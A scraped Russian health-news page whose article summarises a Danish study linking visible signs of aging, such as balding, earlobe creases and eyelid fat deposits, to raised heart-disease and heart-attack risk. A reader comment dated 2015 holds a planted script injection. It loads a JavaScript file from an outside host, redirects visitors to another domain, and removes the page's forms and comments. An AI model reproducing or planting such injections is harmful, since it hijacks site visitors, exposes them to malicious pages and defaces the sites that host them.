Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Внешние признаки старости...  >>  Внешние признаки старости говорят о больном сердце
 
Обратная связь
 

Внешние признаки старости говорят о больном сердце

Размер шрифта
25 декабря 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Датские ученые установили, что наличие внешних признаков старости увеличивает риск развития сердечно-сосудистых заболеваний.

Внешние признаки старения отражают биологический (физиологический), а не фактический (хронологический) возраст человека. Для проведения исследования ученые выбрали четыре признака старения: залысины на висках, лысина на макушке, складка на мочке уха, желтые жировые отложения на веках (ксантелазмы).

Суть исследования

Датские ученые проанализировали данные 10885 человек в возрасте 40 лет и старше. Залысины на висках обнаружены у 7537, лысина на макушке – у 3938, складка на мочке уха – у 3405, ксантелазмы – у 678 человек. Период наблюдения составил 35 лет. За это время у 3401 участника появилось сердечно-сосудистое заболевание, а у 1708 участников развился инфаркт миокарда. Таким образом, наличие внешних признаков старения повышает риск развития сердечно-сосудистого заболевания на 39%, а инфаркта миокарда – на 57%.

Каждый признак в отдельности или в сочетании с другими признаками старения является фактором риска развития сердечно-сосудистых заболеваний независимо от традиционных факторов риска. Самый высокий риск имели лица в возрасте от 70 до 80 лет и лица с несколькими признаками старения.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:27

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Шум самолетов вызывает болезни сердца   Вам назначили новое лекарство. О чем спросить врача?   Сколько лет вашему сердцу?   Иди ты в баню! Это больше не ругательство!  
23 апреля 2013Выпали зубы – у вас болезнь сердца! 03 декабря 2012Время смерти зависит от того, во сколько вы встаете
 
19 марта 2013Аспирин спасает от старческого слабоумия 27 марта 2012Бактерии во рту – угроза для сердца
 

Слайдшоу

1
Вся правда об аритмии
3 органа-мишени в новом году
Наглядное руководство по заболеваниям сердца

Тесты

Грозит ли вам инфаркт миокарда?
Будет ли у вас инфаркт?
Сколько вы проживете?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.